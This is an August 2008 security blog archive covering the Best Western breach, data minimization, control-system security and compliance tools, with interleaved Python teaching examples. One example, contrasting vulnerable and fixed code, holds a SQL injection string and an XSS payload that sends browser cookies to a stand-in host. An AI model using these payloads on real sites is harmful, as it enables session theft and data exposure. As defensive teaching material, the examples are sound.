Archive for August, 2008

Best Western denies the magnitude of the breach

Wednesday, August 27th, 2008

From the Phoenix Business Journal:
Best Western disputes security breach story

Best Western disputes the story, saying there was an isolated incident at a hotel in Germany.

“There was one instance of suspicious activity at a single hotel with respect to 13 guests, who are being notified. We are working with the FBI and international authorities to investigate the source of the other claims, which were never presented to us for investigation prior to publication of the Herald story. We have found no suspicious activity to support them,” said Best Western external communications director Troy Rutman.

Rutman said hotel guest information is protected by a network of firewall and protocols.

“Network of firewall and protocols” - we’ve heard that story before.

If they are indeed working with the FBI, then they won't be able to sidestep the data breach notification requirements mandated by several states.

The saga continues.

Bill

More on the Best Western break in

Wednesday, August 27th, 2008

From the UK’s vnunet.com:
Hackers breach Best Western in data heist

It seems the attacker managed to plant a Trojan on a hotel's computers and log the user name and password of someone whose access was sufficient to reach the corporate servers.

Interesting, but not ingenious.

It does seem to indicate that the attack was targeted explicitly at data theft, rather than someone stumbling across a SQL injection vector.

How could defense-in-depth have helped here?

I guess we still need to learn a little more about how the attack progressed.

  • Did the compromised login give the attacker remote access to the SQL server?
  • Could the website itself return this type of data to anyone holding sufficient credentials?
  • Did the Trojan dial out to a remote server, giving the attacker complete remote control of the box?
  • Even with full remote control, was any egress content filtering in place to stop that data from leaving the network? (Though the attacker could simply have encrypted the channel.)

More from SecurityFocus.com:
Denial, hype cloud report of Best Western breach

“We can confirm that on August 21, 2008, three separate attempts were made via a single log-on ID to access the same data from a single hotel,” the company said in a statement released late Monday. “The hotel in question is the 107-room Best Western Hotel am Schloss Kopenick in Berlin, Germany, where a Trojan horse virus was detected by the hotel’s antivirus software. The compromised log-in ID permitted access to reservations data for that property only. The log-in ID was immediately terminated, and the computer in question has been removed from use.”

Best Western said that it had narrowed down the number of customers affected to 10.


Reducing the risk of unauthorized information disclosure

Monday, August 25th, 2008

Motivating my thinking is yet another data breach.

This time, reported by Scotland’s Sunday Herald in an article:
Revealed: 8 million victims in the world’s biggest cyber heist

Target:
Best Western Hotels

What was lost:

Amounting to a complete identity-theft kit, the stolen data includes a range of private information including home addresses, telephone numbers, credit card details and place of employment.

According to Bill Brenner's SearchSecurity analysis of the 2007 Ponemon Institute study on data breach costs, the average cost of a breach was roughly $200 per record.

The implied cost to Best Western, if the Herald's figure holds: 8,000,000 records × $200/record = $1.6 billion USD.

Now, none of this is rocket science.

Research on the cost of a data breach is published regularly, and most companies can easily determine their total number of potential records.

Looking at a bedrock equation of information security:
Risk = threat x vulnerability x cost

We've already got the cost, and an organization like Best Western should assume the threat of being attacked is very high.

Last is the vulnerability component: the weaknesses that let personally identifiable information, up to and including credit card data, be read out by someone who shouldn't have it.

While an organization like Best Western may not be able to affect the threat and cost components, they sure can do a lot on the vulnerability front.

They can do that through a number of mechanisms, both technical and non-technical (insurance and whatnot), and hence reduce the total risk.

I’ll focus on a few simple things:

1) Determine which data is the most costly to lose

For instance, does an organization really need to retain the credit card information of every patron after they have settled their bill?

If so, should that data be encrypted?

And should access permissions be put in place that prevent bulk reads from the database account servicing the website?

How much non-credit card customer history information do you really need to use for business analysis?

If you don't need more than 3 months of client data, archive the rest off the production system.

The rule of thumb in this area is that if the data isn't critical to business operations, get rid of it, securely!
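As an added example (not from the original post, and not Best Western's systems), here is what step 1 looks like in code: a toy reservations table in SQLite where settled stays keep only the last four digits plus a keyed token in place of the card number, and records older than the retention window are purged. The schema, sample rows, key and 90-day window are all constructed for the illustration; a real deployment would keep the key in an HSM or KMS and export rows to an offline archive before deleting them. Database-level grants that stop the web account from doing bulk reads are DBMS-specific and are not shown here.

```python
# Added example, not from the original post: data minimization for a
# reservations table. Schema, rows, key and retention window are constructed.
import hashlib
import hmac
import sqlite3
from datetime import date, timedelta

# Constructed sample data: (guest, card_number, checkout date, settled?)
SAMPLE_ROWS = [
    ("guest-a", "4111111111111111", "2008-08-20", 1),
    ("guest-b", "5500000000000004", "2008-08-24", 0),  # tab still open
    ("guest-c", "340000000000009", "2008-04-01", 1),   # old and settled
    ("guest-d", "4111111111111111", "2008-08-22", 1),  # same card as guest-a
]
TODAY = date(2008, 8, 25)           # fixed "today" so the demo is repeatable
RETENTION_DAYS = 90                 # assumption: 3 months of live history


def open_db(rows=SAMPLE_ROWS):
    """In-memory reservations table loaded with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE reservations (guest TEXT, card_number TEXT, "
        "card_last4 TEXT, card_token TEXT, checkout TEXT, settled INTEGER)")
    conn.executemany(
        "INSERT INTO reservations (guest, card_number, checkout, settled) "
        "VALUES (?, ?, ?, ?)", rows)
    conn.commit()
    return conn


def card_token(pan, key):
    """Keyed pseudonym (HMAC-SHA256) for a card number: the same card gives
    the same token, so repeat guests still match, but without the key the
    token cannot be turned back into a PAN."""
    return hmac.new(key, pan.encode(), hashlib.sha256).hexdigest()


def scrub_settled_cards(conn, key):
    """Replace the full PAN with last four digits plus a token on every
    settled stay. Returns the number of rows scrubbed."""
    rows = conn.execute(
        "SELECT rowid, card_number FROM reservations "
        "WHERE settled = 1 AND card_number IS NOT NULL").fetchall()
    for rowid, pan in rows:
        conn.execute(
            "UPDATE reservations SET card_number = NULL, card_last4 = ?, "
            "card_token = ? WHERE rowid = ?",
            (pan[-4:], card_token(pan, key), rowid))
    conn.commit()
    return len(rows)


def purge_older_than(conn, days, today=TODAY):
    """Delete stays whose checkout is more than `days` before `today`.
    Returns the number of rows removed. (A real job would export them to
    an offline archive first.)"""
    cutoff = (today - timedelta(days=days)).isoformat()
    cur = conn.execute("DELETE FROM reservations WHERE checkout < ?", (cutoff,))
    conn.commit()
    return cur.rowcount


def full_pans_remaining(conn):
    """Rows still holding a full card number: what a bulk read would yield."""
    return conn.execute("SELECT COUNT(*) FROM reservations "
                        "WHERE card_number IS NOT NULL").fetchone()[0]


def distinct_tokens(conn):
    """Distinct card tokens: repeat-guest matching still works post-scrub."""
    return conn.execute("SELECT COUNT(DISTINCT card_token) FROM reservations "
                        "WHERE card_token IS NOT NULL").fetchone()[0]


def row_count(conn):
    return conn.execute("SELECT COUNT(*) FROM reservations").fetchone()[0]


if __name__ == "__main__":
    key = b"demo-key-keep-the-real-one-in-an-hsm"   # assumption, see lead-in
    db = open_db()
    print("full PANs before scrub:", full_pans_remaining(db))   # 4
    print("rows scrubbed:", scrub_settled_cards(db, key))       # 3
    print("full PANs after scrub:", full_pans_remaining(db))    # 1 (open tab)
    print("rows purged:", purge_older_than(db, RETENTION_DAYS)) # 1
    print("rows retained:", row_count(db))                      # 3
```

The point of the token is that the business questions (is this a repeat guest? which card was used?) can still be answered after the PAN is gone, so "we need it for analysis" stops being a reason to keep card numbers on disk.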

2) Analyze insider access

Who/what, internally, has need-to-know access to the data?

How much access do they need?

Are policies, procedures and technical controls in place to prevent unauthorized access?

3) Analyze partner access

What partners have access to the data?

Exactly what data do they need?

Are they accessing the data through accounts restricted to only the information they need to see?

What is the partner’s security policy for dealing with this information?  Can you trust them?

4) Review policies, procedures, and do validation

Regular review of policies and procedures should be performed.

And most importantly, routine validation of the system should be performed.

A validation check should be both a scheduled and a triggered event. Schedule it regularly so that it actually happens, and trigger it on events such as a new partner being added, a DBA being terminated, or a new contractor being hired.

5) Assume the worst will happen

Because it will.

Bill

This week in Infosec - 2008-08-25

Monday, August 25th, 2008

A weekly snapshot of what's been talked about in the IT security realm over the past week.

Attacks

Adobe Flash ads launching clipboard hijack attack - From the ZDNet Zero Day blog:

Malicious hackers are using booby-trapped Flash banner ads to hijack clipboards for use in rogue security software attacks.

In the Web attacks, which target Mac, Windows and Linux users running Firefox, IE and Safari, hackers are seizing control of the machine’s clipboard and using a hard-to-delete URL that points to a fake anti-virus program.

According to victims on several Web forums, the attack is coming from Adobe Flash-based advertising on legitimate sites — including Newsweek, Digg and MSNBC.com.

We've all got Flash. Keep it patched, though I haven't yet heard whether a patch is available for this attack vector.

Bypassing .NET’s ValidateRequest security feature

The Microsoft .NET framework comes with a request validation feature, configurable by the ValidateRequest setting. ValidateRequest has been a feature of ASP.NET since version 1.1. This feature consists of a series of filters, designed to prevent classic web input validation attacks such as HTML injection and XSS (Cross-site Scripting).

This paper introduces script injection payloads that bypass ASP .NET web validation filters and also details the trial-and-error procedure that was followed to reverse-engineer such filters by analyzing .NET debug errors.

We have a lot of .NET here, and my team is studying this paper.

Breaking News
From the Scottish Sunday Herald, “Revealed: 8 million victims in the world’s biggest cyber heist”

EXCLUSIVE: Sunday Herald uncovers theft of data from every guest in 1300 Best Western Hotels in past 12 months
By Iain S Bruce

AN INTERNATIONAL criminal gang has pulled off one of the most audacious cyber-crimes ever and stolen the identities of an estimated eight million people in a hacking raid that could ultimately net more than £2.8billion in illegal funds.

A Sunday Herald investigation has discovered that late on Thursday night, a previously unknown Indian hacker successfully breached the IT defences of the Best Western Hotel group’s online booking system and sold details of how to access it through an underground network operated by the Russian mafia.

It is a move that has been dubbed the greatest cyber-heist in world history. The attack scooped up the personal details of every single customer that has booked into one of Best Western’s 1312 continental hotels since 2007.

Amounting to a complete identity-theft kit, the stolen data includes a range of private information including home addresses, telephone numbers, credit card details and place of employment.

This raises (again) some important issues for the IT and corporate space.  How much data should you keep about your clients, and for how long?

No matter how good your defense-in-depth is, someone will get through. What will you allow them to find?

I’ll blog more on this later.

Older News
Students from MIT who were going to give a talk at DefCon were stopped by a court order.

Their research showed how to subvert the Massachusetts Bay Transit Authority payment card system.

Their full research was included as part of the court filings. Court documents are public record, so the MBTA essentially released what it was trying to hide.

On the 19th, a judge lifted the restraining order, so the students are free to talk.

Will be interesting to see what happens.

I think this is the second time in the past few months where 'private' information was included in court filings and hence became public.

Tools

Grendel-Scan - released at DefCon, this is a sophisticated, automated, Open Source web application penetration testing tool.

It appears to rival commercial tools.

I’ll be playing with this soon, I hope.

Countermeasures

Reduce attack surface!
Why allow access to anything by anyone who doesn't absolutely need it?

Cyber Warfare
Some discussions have resulted from the attacks on Georgian IT infrastructure by Russian hackers during the past few weeks.

Conclusion seems to be: we don’t have a real definition of what cyber war is, so it isn’t really warfare.

In my mind, true cyber warfare is using attacks against IT infrastructure as a force multiplier, or as a means of applying coercive pressure to an enemy of the state.

I do not think that the attackers have to be state sponsored.

Some would debate whether or not a DDoS is an act of warfare. I say it is if it is intended to apply coercive pressure to an enemy of the state.

A DDoS against a critical communications network or a safety-critical control system would certainly qualify. A DDoS against a n00b's website, perhaps not.

On the Horizon

With elections right around the corner, I’m sure we will see the debate over electronic voting heat up.

Bill

High security options for critical infrastructure

Sunday, August 24th, 2008

According to Wall Street Journal’s MarketWatch, Waterfall Solutions will be presenting at the 2008 PCSF.

In a presentation on Wednesday, August 27th, Mr. Turniansky will give a detailed presentation on the topic of “Unidirectional Connectivity - A Novel Robust Method for Absolute Protection of Process Control Systems”.

Some are too willing to throw out the notion of unidirectional communication in a control system because it requires some special configuration.

My take is that if you want real security, you must consider the overwhelming value of a one-way communication link, particularly where critical control systems are involved.

In control networks there are devices, like sensors and other detectors, that simply generate traffic. They do not need to receive anything. (Devices that are polled over request/response protocols are a different matter; for them the one-way link belongs between the polling system and whoever consumes its data.)

Another possibility is to prevent two way traffic between systems at higher and lower levels of “criticality.”

A no-brainer example would be to employ one-way communication between the control network and the corporate network. This would allow business units to monitor the control network without data (and attacks) flowing from the business side back in.

This would very likely have prevented the shutdown of Unit 2 of the Hatch nuclear power plant earlier this year.

From the Washington Post’s “Cyber Incident Blamed for Nuclear Power Plant Shutdown”

A nuclear power plant in Georgia was recently forced into an emergency shutdown for 48 hours after a software update was installed on a single computer.

The incident occurred on March 7 at Unit 2 of the Hatch nuclear power plant near Baxley, Georgia. The trouble started after an engineer from Southern Company, which manages the technology operations for the plant, installed a software update on a computer operating on the plant’s business network.

Though I don’t know all the details, it’s clear that there was some computer on the business network that must have, through some route, been able to feed back to the control network.

Why introduce the potential for a network-based attack on one of these devices? Simply employ one-way communication.

Methods I've heard about in the past include physically modifying the network link so that it is incapable of carrying traffic in both directions (with fiber, for example, by fitting a transmitter on one side and only a receiver on the other).

In any event, I won't be at PCSF, but hope the presentation is made available.

Bill

Analysis of the cyber war in Georgia

Sunday, August 24th, 2008

Looks like Russell Beck, an intelligence analysis and modeling student over at Penn State, is doing some interesting research on what went down between Russia and Georgia.

He gets into the nitty-gritty and is clearly doing a detailed review of the facts.

Russia vs. Georgia: The War We Didn’t See — Part 1

This is the first of what Russell says will be a several part series.

I’ll post links whenever he posts additional articles.

Bill

Tracking hackers “in the cloud” - how not to

Sunday, August 24th, 2008

I had a long list of titles for this one…OMG

  • Tax dollar - Fail
  • How to spend a whole lot of money for nothing
  • Movie plot software (in a nod to Schneier’s Movie Plot Threats)

Below are some quotes from the article.  I’ll focus on the simple capability of the system, and will leave to others a discussion of the significant privacy issues involved.

Source: “Dalhousie to help U.S. catch cyber terrorists” - The ChronicleHerald Metro section on August 22…

A major software project is underway by the U.S. Department of Homeland Security to monitor levels of Internet traffic and detect possible security breaches — and Dalhousie University is going to help build it.

“We’re just looking at bytes and addresses.”

Mr. McHugh said the new software will be used by government and businesses to monitor who’s trying to access their computer networks. It will look at the amount of information being sent from network to network and turn that complex raw data into some type of graph or chart.

Analysts will read those charts and look for patterns that can help reveal the work of hackers, spammers and cyber terrorists. Mr. McHugh said shady characters on the web will often contact hundreds of different Internet addresses, trying to look for weaknesses or important places to target. Sometimes they’ll try to contact addresses that aren’t even hooked up to a machine.

“If you try to make contact to a lot of addresses where there are no machines, it indicates you’re probing around the network because you don’t know what’s there,” Mr. McHugh explained Thursday.

The technology could eventually be used to track child pornographers, Mr. McHugh said. From a known child pornography site, the program could follow the trail back to an offender’s computer.

Carrie Gates is a Canadian computer scientist and Dalhousie alumna working at CA Labs in New York. Researchers there and in Halifax work together on the project. She said once the software is complete, it will be released to the public so anyone can use it to monitor their computer networks.

Ok, so let me summarize:

  • The system will be used by: government, companies, and individuals.
  • The system will only look at source, destination, and packet size.
  • The system will only reveal the ISP source.

I have lots of issues with this.

First, if you are a company or individual, this system is nothing more than a glorified traffic monitor. It's not even an IDS, since it does nothing but report.

Install a firewall and Snort, and call it a day. If you are really interested, look at the logs/alerts once in a while. This new system is useless for you.

If you are the Government and can get this thing installed in the right place, then you can monitor traffic at a high enough level to pick out some anomalous or suspect activity.
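To make the "bytes and addresses" approach concrete, here is an added example (mine, not part of the article or the DHS/Dalhousie software) of the one heuristic McHugh describes: a source that touches many addresses where nothing answers is probing. The flow records are constructed for the illustration and the thresholds are assumptions.

```python
# Added example, not from the article or the DHS/Dalhousie software: flag
# sources that contact many addresses where no machine ever answers.
from collections import defaultdict

# Constructed flow records: src dst dport bytes replied (1 = destination
# answered, 0 = dark address, nothing there).
SAMPLE_FLOWS = """\
10.0.0.5   192.168.1.10 80   5120 1
10.0.0.5   192.168.1.11 80   4096 1
10.0.0.5   192.168.1.12 443  2048 1
172.16.9.9 192.168.1.1  445  60   0
172.16.9.9 192.168.1.2  445  60   0
172.16.9.9 192.168.1.3  445  60   0
172.16.9.9 192.168.1.4  445  60   0
172.16.9.9 192.168.1.5  445  60   0
172.16.9.9 192.168.1.6  445  60   0
172.16.9.9 192.168.1.10 445  60   1
10.0.0.7   192.168.1.10 22   900  1
10.0.0.7   192.168.1.99 22   60   0
"""


def parse_flows(text):
    """Whitespace-separated flow lines -> list of dicts."""
    flows = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        src, dst, dport, nbytes, replied = line.split()
        flows.append({"src": src, "dst": dst, "dport": int(dport),
                      "bytes": int(nbytes), "replied": replied == "1"})
    return flows


def per_source_profile(flows):
    """Per source: distinct destinations, distinct unanswered destinations,
    total bytes and flow count. Only 'bytes and addresses', no payload."""
    prof = defaultdict(lambda: {"dsts": set(), "dark": set(), "bytes": 0, "n": 0})
    for f in flows:
        p = prof[f["src"]]
        p["dsts"].add(f["dst"])
        if not f["replied"]:
            p["dark"].add(f["dst"])
        p["bytes"] += f["bytes"]
        p["n"] += 1
    return prof


def find_probers(flows, min_dark=5, dark_ratio=0.5):
    """Sources that hit at least `min_dark` unanswered addresses, where
    unanswered addresses make up at least `dark_ratio` of everything they
    touched. One mistyped address does not trip this; a sweep does.
    Thresholds are assumptions for the demo."""
    hits = []
    for src, p in per_source_profile(flows).items():
        dark = len(p["dark"])
        if dark >= min_dark and dark / len(p["dsts"]) >= dark_ratio:
            hits.append(src)
    return sorted(hits)


if __name__ == "__main__":
    flows = parse_flows(SAMPLE_FLOWS)
    for src, p in sorted(per_source_profile(flows).items()):
        print(src, "dsts=%d dark=%d bytes=%d" % (len(p["dsts"]), len(p["dark"]), p["bytes"]))
    print("probing:", find_probers(flows))   # ['172.16.9.9']
```

Note what the output actually is: an IP address that hit your sensor. Whether that is the attacker's machine, a Tor exit, or somebody's compromised box is precisely the question this kind of tool cannot answer.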

But can you tell the source of the attacker?

This leads to my second issue: suppose you can get this device to some critical juncture in the Net. Can you really track an attacker?

Let’s consider this for a second.  They may really be on to something.

Oh, wait: TOR, okbye.

Third.  Well, now that I think this device is completely useless, they could tweak it a little and make it useful.

They could put some content filtering on it and use it to kill spam.

But I think there might already be solutions for this, blink, blink.

Ah well, back to the drawing board.

Bill

Automating NERC CIP compliance

Wednesday, August 20th, 2008

This afternoon I tuned in to a presentation by Tripwire regarding the upcoming release of a NERC CIP policy compliance module, due out September 16 for their Tripwire Enterprise product.

I had used Tripwire back in its open-source days. Back then it was all host-based integrity checking, and that was a long time ago. I kind of long for those days: the product was simple and reliable. Host-based integrity checking, IMHO, is still a cornerstone of good security, and I have yet to find a suitable small-footprint replacement.

I must admit that I fell out of touch with the product after it went closed-source and they started building a business around it.

Well, the little script that was has turned into a rather mature, end-to-end, device-agnostic policy auditing and compliance solution. Tripwire can audit firewall configurations, router configs, hosts, you name it.

Their Enterprise product is modular, allowing you to install pre-built policy checks for tons of stuff (PCI, CIS, FISMA, COBIT, SOX, ISO 27001, FDCC), or build custom checks.

The purpose of this particular presentation was to learn about a new policy compliance module geared toward evaluating compliance with NERC CIPs.

The North American Electric Reliability Corporation (NERC) Critical Infrastructure Protection (CIP) standards are given, essentially, force of law by the Federal Energy Regulatory Commission (FERC).

I don't want my readers' eyes to glaze over, as frequently happens when discussing the myriad regulatory bodies in the energy space, so I'll break it down for you:

$1,000,000 per day, per infraction for failure to be in compliance with NERC CIPs.

Let me see if I can explain that in plain English:

$1,000,000 per day, per infraction for failure to be in compliance with NERC CIPs.

The Tripwire policy module focuses on compliance for the technical CIPs (CIPs 002 to 009, with a focus on 003, 003-6, 005, 007).

Tripwire has a matrix mapping their compliance and auditing checks against the specific NERC CIP requirements, and provides a holistic approach to auditing and assessment.

One nice feature is that where non-compliance is detected, remediation recommendations are presented that can then be attached to a change order so that technicians can implement the recommendations.

The Tripwire people also discussed their product's ability to retain the required auditing and compliance documentation for the mandated minimum of one year.

Concerns

It wouldn’t be one of my posts if I didn’t express some concerns :)

I have two:

1) Does the Tripwire product require an installation on the devices to be audited?

Though I’m not a control system guy, I have heard that some of these devices are extremely ‘fragile’.  Certainly no one wants to install a security module that decreases the availability or integrity of a control system device.

I also get nervous because, in some cases, making any modification to a control device can trigger a rather nightmarish change control process that has serious cost and can have serious regulatory implications.

2) Does the Tripwire system generate a great deal of network load while checks are run?

Again, the worry here is that, from what I’ve read, some control networks are extremely sensitive to latency and load.

Spikes in network traffic or device load can have negative consequences.

Special consideration must be given when considering implementing an automated, scheduled auditing system.

Competitors?

Tripwire is a household name in the IT security space, but are there other solutions out there?

Certainly.

Whereas Tripwire is coming from the IT security space, Digital Bond is a control system security research and consulting outfit that, well, specializes in control system security.

Our friends over at Digital Bond have been developing the Bandolier product.

At the moment, the focus of the product seems to be heavily weighted toward the assessment side. Nevertheless, there is documentation on how to use Bandolier to test for compliance with the NERC CIPs.

I expect that as the Bandolier product matures, automated CIP compliance reports may be generated from the product.

Conclusions

I first got interested in control system/critical infrastructure protection when I began hearing reports of what I perceived to be complete failures of security around SCADA and other control systems.

The more I research, though, the more I see that there is a lot of work being done in this relatively small space.

And I read more and more about vendors coming to the table.

One neat trend I’m seeing… Vendors who build control system hardware are coming to security outfits with their wares asking for help on how to make them more secure.

Now that’s good stuff right there.

Bill

Updated 20080627:

More vendors joining the automated NERC CIP compliance front:
Nexant, Promia to Offer Compliant Cyber Security to Energy Firms

This week in Infosec - 2008-08-18

Monday, August 18th, 2008

Black Hat/Defcon Coverage

Lots of analysis of the Black Hat presentation by Mark Dowd of IBM's ISS and Alexander Sotirov of VMware on circumventing Vista's exploit mitigations.

Essentially, they showed how to bypass most of Vista's built-in memory-protection mechanisms (GS, SafeSEH, DEP, ASLR) when exploiting memory corruption bugs in browsers and other client applications.

Let’s hope Microsoft gets it right in their next OS…

Note, there are some people saying it isn't a big deal. Time will tell.

Here's the summary from the speakers list of Black Hat USA 2008:

Over the past several years, Microsoft has implemented a number of memory protection mechanisms with the goal of preventing the reliable exploitation of common software vulnerabilities on the Windows platform. Protection mechanisms such as GS, SafeSEH, DEP and ASLR complicate the exploitation of many memory corruption vulnerabilities and at first sight present an insurmountable obstacle for exploit developers.

This talk aims to present exploitation methodologies against this increasingly complex target. We will demonstrate how the inherent design limitations of the protection mechanisms in Windows Vista make them ineffective for preventing the exploitation of memory corruption vulnerabilities in browsers and other client applications.


Attack Trends

I keep up to date on NIST's National Vulnerability Database, updates to the milw0rm exploit database, and many others.

Though I don’t read all the alerts in detail (there are usually about 40 per day), I do try to scan enough to get an idea of what’s being disclosed.

The bulk seem to be SQL injection vulnerabilities or cross-site scripting (XSS).

These attacks can be very potent.

SQL injection can lead to information disclosure, unauthorized data modification, and data loss.

SQL injection attacks pass through the browser and web server and reach the database inside a query that the application itself assembles from untrusted input.

XSS generally involves inserting script into URLs or form fields so that, when the page is viewed by others, the script runs in their browsers. It executes in the security context of the vulnerable site, with access to that site's cookies and page content.

Both types of attack are difficult to deal with using "security tools." Most host-based products (antivirus, anti-spyware, etc.) are useless against them.

In both cases the application itself has to change: parameterized queries for the former, output encoding for the latter. Additionally, layer 7 (web application) firewalls can be employed to try to block these attacks.

From a defense-in-depth perspective, both approaches should be employed.
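As an added example (mine, not from the original post), here are the two bug classes side by side, each as the vulnerable pattern and its fix. The table, rows and payloads are constructed for the illustration.

```python
# Added example, not from the original post: SQL injection and XSS, each
# shown as the vulnerable pattern and its fix. Table, rows and payloads are
# constructed for the illustration.
import html
import sqlite3

SQLI_PAYLOAD = "x' OR '1'='1"
XSS_PAYLOAD = "<script>new Image().src='http://evil.invalid/?c='+document.cookie</script>"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "alice@example.invalid"),
                      ("bob", "bob@example.invalid")])
    return conn


def lookup_vulnerable(conn, name):
    """Concatenation: the caller's input becomes part of the SQL text, so a
    quote in the input rewrites the WHERE clause."""
    sql = "SELECT name, email FROM users WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()


def lookup_fixed(conn, name):
    """Parameterized query: the input is bound as a value and is never
    parsed as SQL, whatever characters it contains."""
    return conn.execute(
        "SELECT name, email FROM users WHERE name = ?", (name,)).fetchall()


def greeting_vulnerable(name):
    """Reflects user input straight into the HTML response."""
    return "<p>Welcome, " + name + "</p>"


def greeting_fixed(name):
    """HTML-encodes the input for the element-content context it lands in."""
    return "<p>Welcome, " + html.escape(name, quote=True) + "</p>"


if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, SQLI_PAYLOAD))   # both rows: WHERE clause bypassed
    print(lookup_fixed(db, SQLI_PAYLOAD))        # [] : no user has that literal name
    print(greeting_vulnerable(XSS_PAYLOAD))      # script would run in the victim's browser
    print(greeting_fixed(XSS_PAYLOAD))           # rendered as inert text
```

Neither fix involves a blacklist of bad characters; that is the approach the ValidateRequest paper above shows being bypassed. The query fix changes how the input reaches the database, and the output fix encodes for the exact context the data lands in.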

On another front, attacks against social networking sites continue.

As more and more private data gets into these online resources, they become a more attractive target for attackers.

New Attack Vectors

Kris Kaspersky (a security researcher, not affiliated with Kaspersky Lab) has reported flaws in Intel processors that he says allow remote attackers to execute arbitrary code on any computer using the affected processor.

Man, that’s crazy stuff…

I wrote a blog post about it, “Why agro the OS when you can pwn the hardware?”

Bill

Passive network inventory and control

Sunday, August 17th, 2008

Processingtalk.com posted an article describing a new passive monitoring module for the Tofino security product.

Sounds pretty neat.

When it discovers a new device, it prompts the system administrator to either accept its deductions and insert the new device into the network inventory diagram, or flag the device as a potential intruder.

It also guides the user through creating appropriate firewall rules to allow or block messages, based on what it has learned about the network traffic.

Technical complexities such as IP addressing and TCP/UDP port numbers are managed behind the scenes, making the normally byzantine art of firewall configuration easy for the controls professional.

I guess there’s been a history of typical IT security tools wreaking havoc on control systems:

In 2005, Sandia National Laboratories released a report describing a number of serious events from use of these tools, including this example: “A ping sweep was being performed to identify all hosts that were attached to the network, for inventory purposes, and it caused a system controlling the creation of integrated circuits in the fabrication plant to hang.

The outcome was the destruction of USD50K worth of wafers”.

A concern I’d have about a product like this is the need to assume that all the systems on the network are trusted at the time you are configuring the rule set.

Another is that caution must be used when such a device is operating in the presence of safety systems.

This system has the capacity to block communication, and in a safety system, that could be hazardous.
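As an added example (my own, not Byres Security's code), here is the core of a passive inventory like this, together with the failure mode I'm worried about: learn devices and conversations from observed traffic, propose allow rules with a default deny, then flag anything not seen during learning. The addresses and ports are constructed for the illustration. The last function shows what happens when a rogue host is already talking during the learning window: it is learned as a trusted device and its traffic is never flagged.

```python
# Added example, not Byres Security's code: passive device inventory and
# rule proposal from observed flows, plus the "rogue present during
# learning" failure mode. All traffic below is constructed.

# Constructed commissioning traffic: src dst proto dport
LEARNING_TRAFFIC = """\
10.1.0.10 10.1.0.20 tcp 502
10.1.0.10 10.1.0.21 tcp 502
10.1.0.11 10.1.0.10 tcp 44818
"""

# Constructed traffic seen later: one known flow, one unknown host, one
# known host using a new service.
LATER_TRAFFIC = """\
10.1.0.10 10.1.0.20 tcp 502
10.1.0.99 10.1.0.20 tcp 502
10.1.0.11 10.1.0.10 tcp 22
"""


def parse(text):
    """Flow lines -> list of (src, dst, proto, dport) tuples."""
    rows = []
    for line in text.splitlines():
        if line.strip():
            src, dst, proto, dport = line.split()
            rows.append((src, dst, proto, int(dport)))
    return rows


class PassiveInventory:
    def __init__(self):
        self.devices = set()          # every address seen while learning
        self.conversations = set()    # (src, dst, proto, dport) seen while learning

    def learn(self, flows):
        """Learning phase: everything observed is assumed legitimate."""
        for src, dst, proto, dport in flows:
            self.devices.update((src, dst))
            self.conversations.add((src, dst, proto, dport))

    def proposed_rules(self):
        """One allow rule per learned conversation, default deny last."""
        rules = ["allow %s -> %s %s/%d" % c for c in sorted(self.conversations)]
        return rules + ["deny any -> any"]

    def audit(self, flows):
        """Enforcing phase: report devices and conversations never learned."""
        new_devices = set()
        new_conversations = []
        for flow in flows:
            src, dst, _proto, _dport = flow
            for host in (src, dst):
                if host not in self.devices:
                    new_devices.add(host)
            if flow not in self.conversations:
                new_conversations.append(flow)
        return {"new_devices": sorted(new_devices),
                "new_conversations": new_conversations}


def rogue_baked_in():
    """Failure mode: the rogue 10.1.0.99 is already polling a PLC while the
    inventory is being learned, so it ends up in the allow list."""
    inv = PassiveInventory()
    inv.learn(parse(LEARNING_TRAFFIC) + [("10.1.0.99", "10.1.0.20", "tcp", 502)])
    return inv.audit(parse(LATER_TRAFFIC))


if __name__ == "__main__":
    inv = PassiveInventory()
    inv.learn(parse(LEARNING_TRAFFIC))
    print("\n".join(inv.proposed_rules()))
    print("clean learning:", inv.audit(parse(LATER_TRAFFIC)))
    print("rogue baked in:", rogue_baked_in())
```

The learned rule set is only as good as the snapshot it was taken from, which is why the controls engineer still has to review each proposed device and conversation against what is supposed to be on the network rather than accepting the tool's deductions wholesale.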

But all things considered, much of the control system infrastructure seems to be "tough to secure" without unacceptably high cost.

Bolt-on security is rarely effective, but if a system like this offsets enough risk, it may provide the needed security.

It’s also nice to see a product that doesn’t require the user to have in-depth knowledge of protocols and firewall configuration.

If the control systems people know the devices on their networks, what they do, and which devices should be communicating to which other devices, the Tofino product may be a big help.

If that’s not the case, then the product may be of little value, and simply help provide a false sense of security.

It would be good if Tofino creator Byres Security offered some kind of auditing process to verify that users are implementing the system correctly.

Bill